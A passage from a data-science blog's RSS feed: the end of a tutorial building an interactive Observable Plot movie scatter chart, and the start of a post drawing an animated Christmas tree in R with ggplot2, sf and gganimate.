&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;categorical&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; range&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [getGrey(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#39;orange&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; domain&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [getWonOscarText(&lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;), getWonOscarText(&lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;)], &lt;span style="color:#8b949e;font-style:italic"&gt;// Required for when filtering on oscar wins
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; legend&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; grid&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; marks&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Plot.axisX({ labelAnchor&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;center&amp;#39;&lt;/span&gt;, labelArrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;none&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; xLabel }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Plot.axisY({ labelAnchor&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;center&amp;#39;&lt;/span&gt;, labelArrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;none&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; yLabel }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Plot.dot(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; xVariable.prop,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; yVariable.prop,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; stroke&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; getWonOscarText(d.OscarWinner),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; getGrey(&lt;span style="color:#a5d6ff"&gt;0.4&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; channels&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filmTitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; { value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Title&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; { value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;YearReleased&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; revenue&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; { value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;BoxOffice&amp;#39;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tip&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filmTitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; &lt;span style="color:#a5d6ff"&gt;`Year of release: &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;d&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; revenue&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; &lt;span style="color:#a5d6ff"&gt;`Revenue: $&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;d.toFixed(d &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt; million`&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;, stroke&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
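&lt;p&gt;The revenue line of the tooltip is the least obvious part of the block above, so here it is as a standalone sketch. The function name &lt;code&gt;formatRevenue&lt;/code&gt; is hypothetical and the sample values are made up for illustration; the rounding rule is the one used in the &lt;code&gt;tip&lt;/code&gt; format.&lt;/p&gt;

```javascript
// Hypothetical named version of the tooltip's revenue formatter.
function formatRevenue(d) {
  // Show one decimal place for revenues below 10, none otherwise.
  const decimals = d >= 10 ? 0 : 1;
  return `Revenue: $${d.toFixed(decimals)} million`;
}

// Illustrative values only, not taken from the movies dataset.
console.log(formatRevenue(7.84));  // Revenue: $7.8 million
console.log(formatRevenue(412.6)); // Revenue: $413 million
```

&lt;p&gt;Keeping a decimal place only for small values avoids showing a low-grossing film as &lt;code&gt;$0 million&lt;/code&gt; while keeping larger figures short.&lt;/p&gt;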
&lt;p&gt;We finish with a line of markdown that includes inline JavaScript using &lt;code&gt;${}&lt;/code&gt; syntax:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Number of movies selected: ${ d3.format(&amp;#39;,&amp;#39;)(data.length) }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This line simply prints the number of movies plotted at any given time.&lt;/p&gt;
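&lt;p&gt;To see what the &lt;code&gt;,&lt;/code&gt; format does without loading D3, the sketch below uses the built-in &lt;code&gt;Intl.NumberFormat&lt;/code&gt; as a stand-in. It is an approximation for whole numbers in an English locale, not a replacement for &lt;code&gt;d3.format&lt;/code&gt;, and &lt;code&gt;formatCount&lt;/code&gt; is a hypothetical name.&lt;/p&gt;

```javascript
// Stand-in for d3.format(',') on whole numbers: group digits in threes
// using commas. Assumes the en-US locale is wanted.
const countFormatter = new Intl.NumberFormat('en-US');

function formatCount(n) {
  return countFormatter.format(n);
}

console.log(`Number of movies selected: ${formatCount(1234)}`);
// Number of movies selected: 1,234
console.log(formatCount(987)); // 987
```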
&lt;p&gt;Our app is now fully interactive but everything is arranged down a single column, regardless of screen width!&lt;/p&gt;
&lt;h2 id="next-up"&gt;Next Up&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ve now got a functioning app but the layout isn&amp;rsquo;t great and we haven&amp;rsquo;t yet deployed it anywhere useful. We&amp;rsquo;ll cover both of these things in &lt;a href="https://www.jumpingrivers.com/blog/shiny-to-observable2/"&gt;Part 2&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-to-observable/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating an animated Christmas tree in R</title><link>https://www.jumpingrivers.com/blog/christmas-tree/</link><pubDate>Tue, 24 Dec 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/christmas-tree/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/christmas-tree/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/christmas-tree/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;With Christmas tomorrow, we have decided to create an animated Christmas
tree using &lt;a href="https://ggplot2.tidyverse.org/" rel="external"&gt;{ggplot2}&lt;/a&gt;,
&lt;a href="https://r-spatial.github.io/sf/" rel="external"&gt;{sf}&lt;/a&gt; and
&lt;a href="https://gganimate.com/" rel="external"&gt;{gganimate}&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;First we need a tree. To do this, we use an {sf} polygon: we pass the
coordinates of the Christmas tree to &lt;code&gt;st_polygon&lt;/code&gt; as a list containing
a matrix. We can then use &lt;code&gt;geom_sf&lt;/code&gt; to add this layer onto a ggplot
object.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(gganimate)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sf)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tree_coords &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;matrix&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-2.22&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-3.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-1.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-2.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-0.8&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-1.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;0.8&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;3.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;2.22&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;-4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ncol&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, byrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_polygon&lt;/span&gt;(tree_coords)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(), data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;tree)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="tree_shape.png" class="image-center" style="width: 450px;" alt = "Christmas tree shape made with the sf and ggplot2 R packages."/&gt;
&lt;p&gt;Okay, so now we have a tree shape. Next we need to make it a little more
Christmassy by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Changing the colour using: &lt;code&gt;fill = &amp;quot;forestgreen&amp;quot;, color = &amp;quot;darkgreen&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Adding the trunk:
&lt;code&gt;geom_rect(aes(xmin = -0.75, xmax = 0.75, ymin = -2, ymax = 0), fill = &amp;quot;saddlebrown&amp;quot;, color = &amp;quot;sienna4&amp;quot;)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Adding a star on the top:
&lt;code&gt;geom_point(aes(x = 0, y = 8), color = &amp;quot;gold&amp;quot;, shape = 8, size = 7, stroke = 3)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Removing the axes with: &lt;code&gt;theme_void()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Setting the plot limits: &lt;code&gt;coord_sf(xlim = c(-6, 6), ylim = c(-4, 10))&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Adding a Christmas message:
&lt;code&gt;annotate(&amp;quot;text&amp;quot;, x = 0, y = 9.5, label = &amp;quot;Merry Christmas \n From Jumping Rivers!&amp;quot;, size = 6)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now our tree looks like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(), data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;tree, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;forestgreen&amp;#34;&lt;/span&gt;, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;darkgreen&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_rect&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(xmin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.75&lt;/span&gt;, xmax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.75&lt;/span&gt;, ymin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-2&lt;/span&gt;, ymax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;saddlebrown&amp;#34;&lt;/span&gt;, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sienna4&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;), color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;gold&amp;#34;&lt;/span&gt;, shape &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, stroke &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_sf&lt;/span&gt;(xlim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;), ylim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;annotate&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;9.5&lt;/span&gt;, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Merry Christmas \n From Jumping Rivers!&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gg_tree
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="finished_tree.png" class="image-center" style="width: 450px;" alt = "Green Christmas tree made with the ggplot2 R package."/&gt;
&lt;p&gt;Next we need to use {sf} again to make some lights for the tree, then
{gganimate} to make the lights flash.&lt;/p&gt;
&lt;p&gt;Placing the points within the boundaries of the tree was a trickier task
than we expected, until we stumbled upon &lt;code&gt;st_sample&lt;/code&gt;. We can pass it a
polygon and it’ll create randomly sampled points within the boundaries. We
also create a vector to colour the points.&lt;/p&gt;
